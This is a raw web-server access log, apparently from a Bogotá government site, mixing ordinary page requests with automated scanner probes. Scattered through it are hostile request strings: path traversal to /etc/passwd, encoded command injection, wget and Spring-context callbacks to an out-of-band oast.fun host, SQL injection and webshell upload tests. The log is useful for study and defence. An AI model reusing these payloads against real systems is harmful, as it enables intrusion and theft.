172.22.2.4 - - [21/Dec/2022:04:44:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:04:45:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55680
23.92.21.31 - - [21/Dec/2022:04:47:46 -0500] "GET /qvisdvr/ HTTP/1.1" 404 1049
205.185.127.238 - - [21/Dec/2022:04:47:58 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
201.245.192.253 - - [21/Dec/2022:04:48:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:04:48:40 -0500] "HEAD / HTTP/1.1" 200 -
116.203.250.97 - - [21/Dec/2022:04:50:16 -0500] "GET / HTTP/1.1" 200 319
23.92.21.31 - - [21/Dec/2022:04:50:43 -0500] "GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:04:50:47 -0500] "GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:04:51:21 -0500] "GET /web.config.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:04:51:25 -0500] "GET /SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1" 404 1049
213.180.203.83 - - [21/Dec/2022:04:51:28 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:04:50:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.104.27.41 - - [21/Dec/2022:04:52:15 -0500] "POST /cobbler_api HTTP/1.1" 404 1034
172.22.2.4 - - [21/Dec/2022:04:50:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44920
45.79.136.154 - - [21/Dec/2022:04:52:42 -0500] "POST /Upload/upload_file.php?l=test HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:52:45 -0500] "GET /Upload/test/2JDZKruufGdZRGzg7Nccz7YKCc4.php HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:52:54 -0500] "POST /page/exportImport/uploadOperation.jsp HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:52:57 -0500] "GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1" 404 1022
45.79.136.154 - - [21/Dec/2022:04:53:06 -0500] "GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1" 404 1240
45.79.136.154 - - [21/Dec/2022:04:53:09 -0500] "GET /webadmin/out HTTP/1.1" 404 1240
201.245.192.253 - - [21/Dec/2022:04:53:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:04:53:40 -0500] "HEAD / HTTP/1.1" 200 -
186.102.63.238 - - [21/Dec/2022:04:56:16 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.63.238 - - [21/Dec/2022:04:56:16 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 204 -
172.104.27.41 - - [21/Dec/2022:04:56:24 -0500] "POST /seeyon/htmlofficeservlet HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:56:28 -0500] "GET /seeyon/test123456.jsp?pwd=asasd3344&2JDZJpzCRkn6S0aRFg7wBg6SkBV=ipconfig HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:56:44 -0500] "POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:56:48 -0500] "POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:56:49 -0500] "POST /account HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:56:53 -0500] "POST /account HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:57:01 -0500] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:57:05 -0500] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 1034
80.215.153.226 - - [21/Dec/2022:04:57:34 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
172.22.2.4 - - [21/Dec/2022:04:55:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 30313
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
80.215.153.226 - - [21/Dec/2022:04:57:35 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
80.215.153.226 - - [21/Dec/2022:04:57:36 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
80.215.153.226 - - [21/Dec/2022:04:57:36 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
80.215.153.226 - - [21/Dec/2022:04:57:36 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
207.46.13.51 - - [21/Dec/2022:04:58:11 -0500] "GET /secretaria-de-ambiente-reconoce-15-entidades-distritales-por-su-desempeno-ambiental.html HTTP/1.1" 304 -
201.245.192.253 - - [21/Dec/2022:04:58:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
172.104.27.41 - - [21/Dec/2022:04:58:13 -0500] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 1034
172.104.27.41 - - [21/Dec/2022:04:58:17 -0500] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 404 1034
172.22.2.4 - - [21/Dec/2022:04:56:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51643
216.245.221.92 - - [21/Dec/2022:04:58:40 -0500] "HEAD / HTTP/1.1" 200 -
190.24.109.39 - - [21/Dec/2022:04:59:04 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
190.24.109.39 - - [21/Dec/2022:04:59:04 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 204 -
87.250.224.77 - - [21/Dec/2022:05:01:28 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:05:01:38 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [21/Dec/2022:05:03:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
172.22.2.4 - - [21/Dec/2022:05:01:39 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 51643
172.22.2.4 - - [21/Dec/2022:05:01:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [21/Dec/2022:05:03:40 -0500] "HEAD / HTTP/1.1" 200 -
208.100.26.237 - - [21/Dec/2022:05:03:50 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [21/Dec/2022:05:02:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48801
23.92.21.31 - - [21/Dec/2022:05:04:22 -0500] "GET / HTTP/1.1" 200 319
23.92.21.31 - - [21/Dec/2022:05:04:26 -0500] "POST /checkValid HTTP/1.1" 404 1049
23.92.21.31 - - [21/Dec/2022:05:04:30 -0500] "GET /public/css/2JDZJhL1hO0G5D2dJAadqhvAS99.css HTTP/1.1" 404 1049
45.79.136.154 - - [21/Dec/2022:05:07:01 -0500] "GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 400 949
45.79.136.154 - - [21/Dec/2022:05:07:05 -0500] "GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 400 949
114.119.154.137 - - [21/Dec/2022:05:07:06 -0500] "GET /portaldeninos/tipos-de-arboles-en-bogota/ HTTP/1.1" 200 109802
45.79.136.154 - - [21/Dec/2022:05:07:09 -0500] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 949
172.22.2.4 - - [21/Dec/2022:05:07:51 -0500] "GET /BLA/boletinlegal/Directivas/2022/DIRECTIVA%20No.%2000001%20DEL%2015%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 304 -
45.79.136.154 - - [21/Dec/2022:05:08:06 -0500] "POST /apply_sec.cgi HTTP/1.1" 404 1160
201.245.192.253 - - [21/Dec/2022:05:08:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
45.79.136.154 - - [21/Dec/2022:05:08:10 -0500] "POST /apply_sec.cgi HTTP/1.1" 404 1188
45.79.136.154 - - [21/Dec/2022:05:08:13 -0500] "POST /apply_sec.cgi HTTP/1.1" 404 1188
216.245.221.92 - - [21/Dec/2022:05:08:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:05:07:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:05:08:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52079
172.22.2.4 - - [21/Dec/2022:05:10:20 -0500] "GET /BLA/boletinlegal/conceptos/2020/46.pdf HTTP/1.1" 200 350199
5.255.253.105 - - [21/Dec/2022:05:11:28 -0500] "-" 408 -
201.245.192.253 - - [21/Dec/2022:05:13:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:05:13:40 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.98 - - [21/Dec/2022:05:13:58 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.98 - - [21/Dec/2022:05:13:59 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.104.27.41 - - [21/Dec/2022:05:14:51 -0500] "POST / HTTP/1.1" 200 4720
172.104.27.41 - - [21/Dec/2022:05:14:55 -0500] "POST / HTTP/1.1" 200 4720
172.104.27.41 - - [21/Dec/2022:05:14:59 -0500] "POST / HTTP/1.1" 200 4720
172.22.2.4 - - [21/Dec/2022:05:13:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:05:14:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52942
180.149.125.159 - - [21/Dec/2022:05:16:32 -0500] "GET /c/ HTTP/1.1" 404 1018
190.24.109.39 - - [21/Dec/2022:05:17:14 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
190.24.109.39 - - [21/Dec/2022:05:17:14 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 204 -
201.245.192.253 - - [21/Dec/2022:05:18:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
66.249.64.17 - - [21/Dec/2022:05:18:10 -0500] "-" 408 -
216.245.221.92 - - [21/Dec/2022:05:18:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Dec/2022:05:20:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42777
201.245.192.253 - - [21/Dec/2022:05:20:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40591
172.22.2.4 - - [21/Dec/2022:05:19:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
5.255.253.110 - - [21/Dec/2022:05:21:28 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:05:20:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49193
185.119.81.98 - - [21/Dec/2022:05:22:47 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.98 - - [21/Dec/2022:05:22:48 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [21/Dec/2022:05:21:14 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 54816
201.245.192.253 - - [21/Dec/2022:05:23:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
216.245.221.92 - - [21/Dec/2022:05:23:40 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.13 - - [21/Dec/2022:05:23:50 -0500] "-" 408 -
186.102.77.210 - - [21/Dec/2022:05:24:22 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19M2ZVrHXD2Bu+J6Tx6T5K4zyCxRxyjXmnYLEq6BHhjhpkBexJZesTK&y=U2FsdGVkX1/h7GWDzCBnyvFh97sCEsqWutmXWhBlt/DiOW4QE8I43OleYj56fVEV HTTP/1.1" 200 30
186.102.77.210 - - [21/Dec/2022:05:24:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19oY5PZ2G1gwfhOA9yZxxHBETS/xwXram9A3cbJuY1qpkT+ypaqNCDa+FhHAEx2z4cFfCUme/KmQLQiLOe2B/l2yUg0+1qTETI=&u=U2FsdGVkX18+rZsUdQYivvHzzA8yk8dZBLQAJyNwhC4=&y=U2FsdGVkX1/h7GWDzCBnyvFh97sCEsqWutmXWhBlt/DiOW4QE8I43OleYj56fVEV HTTP/1.1" 200 97
186.102.77.210 - - [21/Dec/2022:05:24:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19OgOxbeGkUP1V9dExOY7AYPOkeSHqMiAoX4qIyRt6IuSJbDUq1MceNBZo6jJW3UmPBX+5d7WTqfuagmEGTZMLQgGJhDBcc6Os+P+J+Nmso7AU6im9q7+siVNthZ3ZNLnsBaIMXKgoa/NcpSRbM6J6P5dwAh8PhSWo0I1Wt+wj2IrtwGnR/botUSUmwYsY//wU+zbPBCzM1XT+fI1BhOo9Q4VZBWM6ckLp6cLzEitPZQGNHeK0SO5QchPT/b0daMbpiq4jMVyov0RgupUdVdLzAgF3FJdheA68JXeu+RujWpjrR3uZ4EeNmbePIiUub6aLVkVY2i4y4kple1+k5KecRwO+AC+lS0yBiLz+whP1IRV/HGh9keTQ5JxLcybZTzbGXu+CTnMNjxhmUYaB/eO2dzkfn7e/gL+xm6x2E0g10xaZk4RA3qIhttk70YHgYUi8Cpi6AUhce+rP4u0yaBopKDRACAN/6DhOcR3IExX/NqzhvklmX8FPOuHQyWmygAS7DE2ozqqYzvm6BmZZp3+x+BM/gPYlLI3RRk44zm2VfzFQBZB4a2LQxWtL3ey2e+modV0TZ+wPDmW06WL3H/etcLSAem9xdL9Tn/UmKRjwQGOpT4DDYImpTmWPIR6VmRVsIsKsAu+p5tu7juJxzS23oLzm1eodw+ZsSywXyvo+PvA7PvrrwNsyjRxesZp8ytpr0JAnyMvtB7KineA8ueXI9vka7PO9Btn2VW/DW9QVrA2EpyCcyiV4lMrT687ygmuwZB7YwgcYXnJUQ9dcIxsaOXsfc42bn+9v+Pb3IwIMEXxhSO26g4pg0EMARMzGOkdhkgBT5fvvMvwZ87g5NGH436c2E7DAaA4SyOenCpZbgLLDH7RCX+Tv9j//dGHoqYNJ/T1jjzN6hV4Mw6lIcQP57Y1yrtdJ0Sl7ILZdTWGgEDdvi9a91LUd6J9/FfnYH5UestJ+6q31VXRPufdl2uHCRe6NwqfWUxa3ePoOOGpMrAyYqHdwY/kPjgLkGxaDGI16/LDtGnoT0aH7fkDrWspQgmXT9S8rlSTTZpursbJb5e7hi/hgmExRMVsCVN2guWoMKreQHq1mVyfpf88+SgLpvOQZtBywIAq5DhujLcOwHAoB/tG5yvdGVo+5OLCqUoXT5ADMc76VoAnLczZL7EQnr5uua/kBjpdBCvNe6MhvhBP7j2tKfMUiLAg4tC7cNzVr4wHlhadHlkbMs82n7oUyr1d6pqqiMj5mQtM0L5PRTCOMcH/USRw3YXsFiYo6S2/XLmTf92SE/XilaVCGs+t7thZZwAR/mvjFRIvLcyh2OzMF6TwoyPBN2lBNXCB8X15hcPdXVfWn8tafF5TXi+skQ0jJLFuvrMywj1GyMHzDpxcaI2H6BXWBgPvR+PeHRYBFnGIVRVU+G24/Jz3FORvtnpfm5kaGPKp0=&u=U2FsdGVkX18+rZsUdQYivvHzzA8yk8dZBLQAJyNwhC4=&y=U2FsdGVkX1/h7GWDzCBnyvFh97sCEsqWutmXWhBlt/DiOW4QE8I43OleYj56fVEV HTTP/1.1" 200 4578
186.102.77.210 - - [21/Dec/2022:05:24:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX195oM5EcBX10cbxNtUkSwtNsA7rU0rMbWcgitC/Y6RETKX+h/l8+dHRs6ReELUJcD6Ff1zRd6p5y06sAc76FzikY942yQZ7QaVCIORQtPoN8fhHf1ZLsxohbHsmsCgIRa+gOWDvMhKBVLRygdpum/WwB7PR64MkTYtwWuWZpUWGMFUAfyGrNx56LWKqifDvYJIpGloMBLwyy/I8MPfervrtWH6Un3T+rcbe/VAlrECZSnoh0by3PXM4C0Ap7rhzWk8xIzIjFSewJhfNh6ZndDO9wOMFUwYpO9LYsT4N+ROTcLV3AgUCvWk8tFHdhfb2xPsZxErwpW8/rg==&u=U2FsdGVkX18+rZsUdQYivvHzzA8yk8dZBLQAJyNwhC4=&y=U2FsdGVkX1/h7GWDzCBnyvFh97sCEsqWutmXWhBlt/DiOW4QE8I43OleYj56fVEV HTTP/1.1" 200 196
186.102.77.210 - - [21/Dec/2022:05:24:23 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19M2ZVrHXD2Bu+J6Tx6T5K4zyCxRxyjXmnYLEq6BHhjhpkBexJZesTK HTTP/1.1" 200 31032
172.22.2.4 - - [21/Dec/2022:05:25:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:05:25:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
201.245.192.253 - - [21/Dec/2022:05:28:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "POST /BLA/boletinlegal/webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "GET /BLA/boletinlegal/cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://cehd0k4l986cc4o00010o1yic6rkz9dy7.oast.fun;%27 HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "POST /BLA/boletinlegal/debug.php HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "POST /BLA/boletinlegal/wp-json/buddypress/v1/signup HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "GET /BLA/boletinlegal/owa/auth/x.js HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "GET /BLA/boletinlegal/users/sign_in HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "POST /BLA/boletinlegal/ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "POST /BLA/boletinlegal/j_security_check HTTP/1.1" 404 1232
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "POST /BLA/boletinlegal/service/extdirect HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "POST /BLA/boletinlegal/app/options.py HTTP/1.1" 404 1236
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "GET /BLA/boletinlegal/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "GET /BLA/boletinlegal/ucmdb-api/connect HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "GET /BLA/boletinlegal/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "POST /BLA/boletinlegal/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\xf0\x9f\xa6\x9e\":\"test\"} HTTP/1.1" 404 1038
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "GET /BLA/boletinlegal/STATE_ID/123/agentLogUploader HTTP/1.1" 404 1038
216.245.221.92 - - [21/Dec/2022:05:28:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "GET /BLA/boletinlegal/?location=search HTTP/1.1" 200 24523
172.22.2.4 - - [21/Dec/2022:05:28:27 -0500] "GET /BLA/boletinlegal/index.php?g=g&m=Door&a=index&content=<?php%20echo%20md5('ThinkCMF'); HTTP/1.1" 200 24523
157.55.39.172 - - [21/Dec/2022:05:29:32 -0500] "GET /bla/resoluciones/notificaciones/autos%202020/3237.pdf HTTP/1.1" 304 -
172.104.27.41 - - [21/Dec/2022:05:30:12 -0500] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cehd0kcl986cc5g0001095cgbkoad7xpe.oast.fun') HTTP/1.1" 404 1034
66.249.64.13 - - [21/Dec/2022:05:30:17 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:05:30:28 -0500] "GET /BLA/boletinlegal/api/jsonws/ HTTP/1.1" 404 1018
201.245.192.253 - - [21/Dec/2022:05:30:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42777
201.245.192.253 - - [21/Dec/2022:05:30:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40591
172.22.2.4 - - [21/Dec/2022:05:30:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
5.255.253.90 - - [21/Dec/2022:05:31:28 -0500] "-" 408 -
95.217.144.237 - - [21/Dec/2022:05:31:55 -0500] "-" 408 -
95.217.144.250 - - [21/Dec/2022:05:32:04 -0500] "-" 408 -
95.217.144.250 - - [21/Dec/2022:05:32:07 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:05:32:20 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
95.217.144.240 - - [21/Dec/2022:05:32:21 -0500] "-" 408 -
172.22.2.4 - - [21/Dec/2022:05:30:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Dec/2022:05:33:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
172.22.2.4 - - [21/Dec/2022:05:31:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49550
216.245.221.92 - - [21/Dec/2022:05:33:40 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.174 - - [21/Dec/2022:05:34:22 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 249324
172.22.2.4 - - [21/Dec/2022:05:34:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47659
66.249.64.13 - - [21/Dec/2022:05:36:03 -0500] "-" 408 -
207.46.13.194 - - [21/Dec/2022:05:34:27 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 49193
186.155.164.122 - - [21/Dec/2022:05:36:54 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.155.164.122 - - [21/Dec/2022:05:36:55 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
186.155.164.122 - - [21/Dec/2022:05:36:55 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
186.155.164.122 - - [21/Dec/2022:05:36:55 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
186.155.164.122 - - [21/Dec/2022:05:36:55 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
186.155.164.122 - - [21/Dec/2022:05:36:55 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.155.164.122 - - [21/Dec/2022:05:36:59 -0500] "POST /appsia/controlador HTTP/1.1" 200 3598
186.155.164.122 - - [21/Dec/2022:05:36:59 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
186.155.164.122 - - [21/Dec/2022:05:37:06 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
186.155.164.122 - - [21/Dec/2022:05:37:34 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
186.155.164.122 - - [21/Dec/2022:05:37:42 -0500] "POST /appsia/controlador HTTP/1.1" 200 7730
186.155.164.122 - - [21/Dec/2022:05:37:42 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
186.155.164.122 - - [21/Dec/2022:05:38:00 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
201.245.192.253 - - [21/Dec/2022:05:38:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
172.22.2.4 - - [21/Dec/2022:05:36:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [21/Dec/2022:05:38:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Dec/2022:05:37:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49550
188.136.169.84 - - [21/Dec/2022:05:40:15 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [21/Dec/2022:05:40:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42777
201.245.192.253 - - [21/Dec/2022:05:40:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40591
95.108.213.26 - - [21/Dec/2022:05:41:28 -0500] "-" 408 -
69.63.184.116 - - [21/Dec/2022:05:42:07 -0500] "GET /dale-una-nueva-oportunidad-a-tu-ropa-usada-se-trasladan-dos-puntos-para-llevarla.html HTTP/1.1" 206 913
157.55.39.212 - - [21/Dec/2022:05:42:54 -0500] "GET /portaldeninos/wp-content/uploads/2020/05/fb.jpg HTTP/1.1" 200 9893
201.245.192.253 - - [21/Dec/2022:05:43:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44094
